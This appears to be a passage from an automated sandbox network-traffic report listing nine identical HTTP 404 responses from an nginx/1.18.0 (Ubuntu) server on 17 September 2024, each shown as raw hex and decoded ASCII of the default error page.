                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:50 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:58 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:38 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
